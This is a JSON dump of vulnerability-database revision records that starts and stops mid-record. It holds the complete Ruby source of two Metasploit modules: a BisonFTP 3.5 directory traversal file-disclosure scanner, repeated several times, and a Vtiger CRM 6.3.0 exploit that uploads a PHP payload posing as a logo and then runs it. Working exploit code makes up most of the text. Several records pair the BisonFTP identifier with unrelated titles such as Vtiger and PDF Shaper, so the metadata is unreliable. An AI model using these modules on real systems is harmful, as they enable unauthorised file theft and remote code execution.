This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T21:00:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 69}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f56406218e2820490bbc2482df3669ed", "type": "metasploit", "bulletinFamily": "exploit", "title": "Vtiger CRM - Authenticated Logo Upload RCE", "description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. 
This module was tested against vTiger CRM v6.3.0.\n", "published": "2018-07-17T23:28:33", "modified": "2018-07-30T17:15:59", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6000", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1713"], "cvelist": ["CVE-2015-6000", "CVE-2016-1713"], "lastseen": "2019-07-22T20:47:44", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-07-22T20:47:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1713"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32624", "SECURITYVULNS:VULN:14750"]}, {"type": "zdt", "idList": ["1337DAY-ID-30805", "1337DAY-ID-24304", "1337DAY-ID-30084"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VTIGER_LOGO_UPLOAD_EXEC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148753", "PACKETSTORM:133755"]}, {"type": "dsquare", "idList": ["E-622"]}, {"type": "exploitdb", "idList": ["EDB-ID:38345", "EDB-ID:44379"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808752"]}], "modified": "2019-07-22T20:47:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vtiger_logo_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Vtiger CRM - Authenticated Logo Upload RCE',\n 'Description' => %q{\n Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code 
and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.\n },\n 'Author' =>\n [\n 'Benjamin Daniel Mussler', # Discoverys\n 'Touhid M.Shaikh <touhidshaikh22@gmail.com>', # Metasploit Module\n 'SecureLayer7.net' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-6000'],\n ['CVE','2016-1713'],\n ['EDB', '38345']\n ],\n 'DefaultOptions' =>\n {\n 'Encoder' => 'php/base64',\n 'RPORT' => 8888\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['vTiger CRM v6.3.0', {}],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 28 2015'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Base vTiger CRM directory path', '/']),\n OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [ true, 'Password to authenticate with', ''])\n ])\n\n register_advanced_options(\n [\n OptBool.new('PHPSHORTTAG', [true, 'Use short open php tags around payload', true])\n ])\n end\n\n def check\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })\n\n unless res\n vprint_error(\"Unable to access the index.php file\")\n return CheckCode::Unknown\n end\n\n unless res.code == 200\n vprint_error(\"Error accessing the index.php file\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\\/small>/i\n vprint_status(\"vTiger CRM version: #{$1}\")\n if $1 == '6.3.0'\n return CheckCode::Vulnerable\n else\n return CheckCode::Detected\n end\n end\n\n CheckCode::Safe\n end\n\n # Login Function.\n def login\n # Dummy Request for grabbing CSRF token and PHPSESSION ID\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could 
not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for login: #{csrf}\")\n\n # Get Login now.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login',\n },\n 'vars_post' => {\n '__vtrftk' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n },\n })\n\n unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\")\n end\n\n cookie = nil\n if res.code == 302 && res.headers['Location'].include?(\"index.php?module=Users&parent=Settings&view=SystemSetup\")\n vprint_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n cookie = res.get_cookies.split[-1]\n end\n\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n\n cookie\n end\n\n def exploit\n cookie = login\n unless cookie\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed\")\n end\n\n pay_name = rand_text_alpha(rand(5..10)) + \".php\"\n\n # Retrieve CSRF token\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie\n })\n\n # Grabbing CSRF token from body\n /var csrfMagicToken = \"(?<csrf>sid:[a-z0-9,;:]+)\";/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"CSRF Token for Form Upload: #{csrf}\")\n\n stager = datastore['PHPSHORTTAG'] ? '<? 
' : '<?php '\n stager << payload.encoded\n stager << ' ?>'\n\n # Setting Company Form data\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, nil, nil, \"form-data; name=\\\"__vtrftk\\\"\") # CSRF token\n post_data.add_part('Vtiger', nil, nil, \"form-data; name=\\\"module\\\"\")\n post_data.add_part('Settings', nil, nil, \"form-data; name=\\\"parent\\\"\")\n post_data.add_part('CompanyDetailsSave', nil, nil, \"form-data; name=\\\"action\\\"\")\n post_data.add_part(stager, \"image/jpeg\", nil, \"form-data; name=\\\"logo\\\"; filename=\\\"#{pay_name}\\\"\")\n post_data.add_part('vtiger', nil, nil, \"form-data; name=\\\"organizationname\\\"\")\n data = post_data.to_s\n\n print_status(\"Uploading payload: #{pay_name}\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vhost' => \"#{rhost}\",\n 'cookie' => cookie,\n 'connection' => 'close',\n 'headers' => {\n 'Referer' => \"http://#{peer}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails\",\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n\n unless res && res.code == 302\n fail_with(Failure::None, \"#{peer} - File wasn't uploaded, aborting!\")\n end\n\n # Cleanup file\n register_files_for_cleanup(pay_name)\n\n vprint_status(\"Executing Payload: #{peer}/test/logo/#{pay_name}\" )\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"test\", \"logo\", pay_name)\n })\n\n if res && res.code != 200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Payload not executed\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T20:47:44", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 70}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": 
"6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-22T22:56:46", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-22T22:56:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-22T22:56:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T22:56:46", "differentElements": ["sourceData"], "edition": 71}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-31T20:54:49", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-07-31T20:54:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-31T20:54:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T20:54:49", "differentElements": ["sourceData"], "edition": 72}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-31T22:51:18", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-31T22:51:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-31T22:51:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T22:51:18", "differentElements": ["sourceData"], "edition": 73}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "709d8b8cf7edef3c39160f6fad1d835e", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-07T13:41:45", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2019-08-07T13:41:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-08-07T13:41:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-07T13:41:45", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-08-07T15:51:10", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-08-07T15:51:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-08-07T15:51:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. 
This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. 
Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-07T15:51:10", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 75}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "5b127a73798ae08a29afbb5203e4504a", "type": "metasploit", "bulletinFamily": "exploit", "title": "PDF Shaper Buffer Overflow", "description": "PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when we use Convert PDF to Image and use a specially crafted PDF file. 
This module has been tested successfully on Win XP, Win 7, Win 8, Win 10.\n", "published": "2016-11-18T17:36:02", "modified": "2018-08-26T04:18:38", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-11T01:38:46", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 3.8, "vector": "NONE", "modified": "2019-08-11T01:38:46"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:8402841988995962344"]}, {"type": "threatpost", "idList": ["THREATPOST:D6C7F34C6376E7ECB543180954D154D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:62182E90D88C9282869F40D834CA56BA"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142721", "OPENVAS:1361412562310142720", "OPENVAS:1361412562310142719", "OPENVAS:1361412562310815270", "OPENVAS:1361412562310815272", "OPENVAS:1361412562310891873", "OPENVAS:1361412562310113454", "OPENVAS:1361412562310815271", "OPENVAS:1361412562310112620", "OPENVAS:1361412562310891872"]}, {"type": "f5", "idList": ["F5:K15759349"]}, {"type": "cve", "idList": ["CVE-2018-20955"]}, {"type": "mssecure", "idList": ["MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "slackware", "idList": ["SSA-2019-220-01"]}, {"type": "debian", "idList": 